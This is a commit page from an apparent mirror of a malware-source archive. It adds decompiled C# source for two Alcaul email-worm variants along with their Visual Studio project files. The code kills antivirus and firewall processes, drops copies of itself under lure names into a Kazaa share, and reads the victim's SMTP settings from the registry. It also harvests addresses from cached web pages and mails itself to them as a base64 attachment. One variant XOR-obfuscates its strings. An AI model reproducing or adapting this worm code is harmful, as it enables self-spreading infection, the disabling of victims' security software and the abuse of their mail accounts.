daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/Email-Worm.Win32.Alcaul.af.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>2peace</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="alcopaul\brigadaochodotnet.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/Email-Worm.Win32.Alcaul.af.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "2peace", "Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.csproj", "{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/alcopaul/brigadaochodotnet.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: alcopaul.brigadaochodotnet
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace alcopaul
{
public class brigadaochodotnet
{
public static void Main(string[] args)
{
string str1 = "zonealarm,wfindv32,vb6,webscanx,vsstat,vshwin32,vsecomr,vscan40,vettray,vet95,tds2-nt,tds2-98,tca,tbscan,sweep95,sphinx,smc,serv95,scrscan,scanpm,scan95,scan32,safeweb,rescue,rav7win,rav7,persfw,pcfwallicon,pccwin98,pavw,pavsched,pavcl,padmin,outpost,nvc95,nupgrade,normist,nmain,nisum,navwnt,navw32,navnt,navlu32,navapw32,n32scanw,mpftray,moolive,luall,lookout,lockdown2000,jedi,iomon98,iface,icsuppnt,icsupp95,icmon,icloadnt,icload95,ibmavsp,ibmasn,iamserv,iamapp,frw,fprot,fp-win,findviru,f-stopw,f-prot95,f-prot,f-agnt95,espwatch,esafe,ecengine";
string str2 = "dvp95_0,dvp95,cleaner3,cleaner,claw95cf,claw95,cfinet32,cfinet,cfiaudit,cfiadmin,blackice,blackd,avwupd32,avwin95,avsched32,avpupd,avptc32,avpm,avpdos32,avpcc,avp32,avp,avnt,avkserv,avgctrl,ave32,avconsol,autodown,apvxdwin,anti-trojan,ackwin32,_avpm,_avpcc,_avp32";
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string ave in strArray1)
brigadaochodotnet.killprocs(ave);
foreach (string ave in strArray2)
brigadaochodotnet.killprocs(ave);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string tach = brigadaochodotnet.uue(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[11]
{
"shakira.exe",
"avril_lavigne.exe",
"Visual_Studio.NET2003_key.exe",
"teach_yourself_c#_in_1_week.exe",
"scan.net.exe",
"hitman2fulldownloader.exe",
"Tekken4_full_downloader.exe",
"teach_yourself_COBOL.NET_in_21_days.exe",
"how_to_get_chicks_on_your_bed.exe",
"brigadaocho.net.exe",
"drunken_pope_pics.exe"
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager", true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + registryKey1.GetValue("Default Mail Account").ToString(), true);
string mserv = registryKey2.GetValue("SMTP Server").ToString();
string fm = registryKey2.GetValue("SMTP Email Address").ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, "*.ht*"))
brigadaochodotnet.extractmails(file, mserv, fm, tach);
}
}
int num = (int) MessageBox.Show("brigada ocho ::: \"bringing the c# technology to the masses\"", "msil.mass by PerrunBoy ::: http://vx.netlux.org/~b8", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
public static void extractmails(string phile, string mserv, string fm, string tach)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(phile, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string to = brigadaochodotnet.xtrak(streamReader.ReadLine());
if (to != "")
brigadaochodotnet.castaway(mserv, fm, to, tach);
}
streamReader.Close();
}
public static string xtrak(string datum)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = datum;
try
{
int sourceIndex = str1.IndexOf("mailto:");
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace("mailto:", "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string uue(string attch)
{
FileStream input = new FileStream(attch, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void killprocs(string ave)
{
foreach (Process process in Process.GetProcessesByName(ave))
process.Kill();
}
public static void castaway(string serv, string from, string to, string attch)
{
string str1 = "From: " + from + " <" + from + ">\r\n";
string str2 = "To: " + to + " <" + to + ">\r\n";
string str3 = "Date: " + DateTime.Now.ToString() + "\r\n";
string str4 = "X-Mailer: dotNETSMTPengine\r\n";
string str5 = "X-Priority: 3\r\n";
string str6 = "MIME-Version: 1.0\r\n";
string str7 = "Content-Type: multipart/mixed; boundary=\"----=rerty\";\r\n\r\n";
string str8 = "This is a multi-part message in MIME format.\r\n\r\n";
string str9 = "------=rerty\r\n";
string str10 = "Content-Type: text/html; charset=us-ascii\r\n\r\n";
string str11 = "\"all we are saying, is give peace a chance. no to war and terrorism.\"\r\n\r\n";
string str12 = "------=rerty\r\n";
string str13 = "Content-Type: application/x-msdownload; name=\"topeace.exe\"\r\n";
string str14 = "Content-Transfer-Encoding: base64\r\n";
string str15 = "Content-Disposition: attachment; ";
string str16 = "filename=\"topeace.exe\"\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "------=rerty--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(serv, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes("HELO localhost\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes("MAIL FROM: <" + from + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes("RCPT TO: <" + to + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes("DATA\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + attch + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes("QUIT\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/Email-Worm.Win32.Alcaul.ah.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>b</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="drunkenpope\brigada8.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/Email-Worm.Win32.Alcaul.ah.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "b", "Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.csproj", "{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.Build.0 = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.ActiveCfg = Release|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/drunkenpope/brigada8.cs
+230
View File
@@ -0,0 +1,230 @@
// Decompiled with JetBrains decompiler
// Type: drunkenpope.brigada8
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace drunkenpope
{
public class brigada8
{
public static void Main(string[] args)
{
try
{
string str1 = brigada8.modem("xmlgcncpo.udklft10.t`4.ug`qaclz.tqqvcv.tqjukl10.tqgamop.tqacl62.tgvvpc{.tgv;7.vfq0/lv.vfq0/;:.vac.v`qacl.quggr;7.qrjklz.qoa.qgpt;7.qapqacl.qaclro.qacl;7.qacl10.qcdgug`.pgqawg.pct5ukl.pct5.rgpqdu.raducnnkaml.raaukl;:.rctu.rctqajgf.rctan.rcfokl.mwvrmqv.lta;7.lwrepcfg.lmpokqv.lockl.lkqwo.lctulv.lctu10.lctlv.lctnw10.lctcru10.l10qaclu.ordvpc{.ommnktg.nwcnn.nmmimwv.nmaifmul0222.hgfk.kmoml;:.kdcag.kaqwrrlv.kaqwrr;7.kaoml.kanmcflv.kanmcf;7.k`octqr.k`ocql.kcoqgpt.kcocrr.dpu.drpmv.dr/ukl.dklftkpw.d/qvmru.d/rpmv;7.d/rpmv.d/celv;7.gqrucvaj.gqcdg.gagleklg");
string str2 = brigada8.modem("ftr;7]2.ftr;7.angclgp1.angclgp.ancu;7ad.ancu;7.adklgv10.adklgv.adkcwfkv.adkcfokl.`ncaikag.`ncaif.ctuwrf10.ctukl;7.ctqajgf10.ctrwrf.ctrva10.ctro.ctrfmq10.ctraa.ctr10.ctr.ctlv.ctiqgpt.cteavpn.ctg10.ctamlqmn.cwvmfmul.crtzfukl.clvk/vpmhcl.caiukl10.]ctro.]ctraa.]ctr10");
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string vry324 in strArray1)
brigada8.kernelhalt(vry324);
foreach (string vry324 in strArray2)
brigada8.kernelhalt(vry324);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string akt7 = brigada8.xmlparse234(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Icxcc^NmacnAmlvglv"), true).SetValue(brigada8.modem("Fkp2"), (object) (brigada8.modem("2301678") + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[4]
{
brigada8.modem("Tkqwcn]Qvwfkm,LGV0221]ig{,gzg"),
brigada8.modem("vgcaj]{mwpqgnd]a!]kl]3]uggi,gzg"),
brigada8.modem("jkvocl0,gzg"),
brigada8.modem("Vgiigl6]dwnn,gzg")
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp"), true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp^Caamwlvq^") + registryKey1.GetValue(brigada8.modem("Fgdcwnv\"Ockn\"Caamwlv")).ToString(), true);
string m91 = registryKey2.GetValue(brigada8.modem("QOVR\"Qgptgp")).ToString();
string foam = registryKey2.GetValue(brigada8.modem("QOVR\"Gockn\"Cffpgqq")).ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, brigada8.modem("(,jv(")))
brigada8.melee(file, m91, foam, akt7);
}
}
int num = (int) MessageBox.Show(brigada8.modem("lm\"ompg\"`gvc\"vumq"), brigada8.modem("oqkn,ocqq,`\"*a!n{\"ocfg+\"`{\"cnamrcwn-`pkecfc\"majm"), MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
catch
{
}
}
public static void melee(string f91, string m91, string foam, string akt7)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(f91, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string hjkl = brigada8.harvest(streamReader.ReadLine());
if (hjkl != "")
{
try
{
brigada8.codedom563(m91, foam, hjkl, akt7);
}
catch
{
}
}
}
streamReader.Close();
}
public static string harvest(string helga)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = helga;
try
{
int sourceIndex = str1.IndexOf(brigada8.modem("ocknvm8"));
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace(brigada8.modem("ocknvm8"), "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string xmlparse234(string tukoo)
{
FileStream input = new FileStream(tukoo, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void kernelhalt(string vry324)
{
foreach (Process process in Process.GetProcessesByName(vry324))
process.Kill();
}
public static string modem(string hhh)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hhh.Length; ++index)
{
int num = Convert.ToInt32(hhh[index]) ^ 2;
stringBuilder.Append(Convert.ToChar(num));
}
return stringBuilder.ToString();
}
public static void codedom563(string asdf, string cvbn, string hjkl, string tukoo)
{
string str1 = brigada8.modem("Dpmo8\"") + cvbn + " <" + cvbn + ">\r\n";
string str2 = brigada8.modem("Vm8\"") + hjkl + " <" + hjkl + ">\r\n";
string str3 = brigada8.modem("Fcvg8\"") + DateTime.Now.ToString() + "\r\n";
string str4 = brigada8.modem("Z/Ockngp8\"fmlmvvmwaj") + "\r\n";
string str5 = brigada8.modem("Z/Rpkmpkv{8\"1") + "\r\n";
string str6 = brigada8.modem("OKOG/Tgpqkml8\"3,2") + "\r\n";
string str7 = brigada8.modem("Amlvglv/V{rg8\"ownvkrcpv-okzgf9\"`mwlfcp{? //`q`h 9") + "\r\n\r\n";
string str8 = brigada8.modem("Vjkq\"kq\"c\"ownvk/rcpv\"ogqqceg\"kl\"OKOG\"dmpocv,") + "\r\n\r\n";
string str9 = "----bsbj\r\n";
string str10 = brigada8.modem("Amlvglv/V{rg8\"vgzv-jvon9\"ajcpqgv?wq/cqakk") + "\r\n\r\n";
string str11 = brigada8.modem(" Rggp/vm/Rggp\",LGV\"Qmdvucpg\"cvvcajgf,\"Pgswkpgq\"vjg\",LGV\"dpcogumpi, ") + "\r\n\r\n";
string str12 = "----bsbj\r\n";
string str13 = brigada8.modem("Amlvglv/V{rg8\"crrnkacvkml-z/oqfmulnmcf9\"lcog? lgvdz3,gzg ") + "\r\n";
string str14 = brigada8.modem("Amlvglv/Vpclqdgp/Glamfkle8\"`cqg46") + "\r\n";
string str15 = brigada8.modem("Amlvglv/Fkqrmqkvkml8\"cvvcajoglv9\"");
string str16 = brigada8.modem("dknglcog? lgvdz3,gzg ") + "\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "----bsbj--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(asdf, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes(brigada8.modem("JGNM\"nmacnjmqv") + "\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes(brigada8.modem("OCKN\"DPMO8\"") + "<" + cvbn + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes(brigada8.modem("PARV\"VM8\"") + "<" + hjkl + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes(brigada8.modem("FCVC") + "\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + tukoo + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes(brigada8.modem("SWKV") + "\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.1289.25246")]
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/Email-Worm.Win32.Conut.csproj
+45
View File
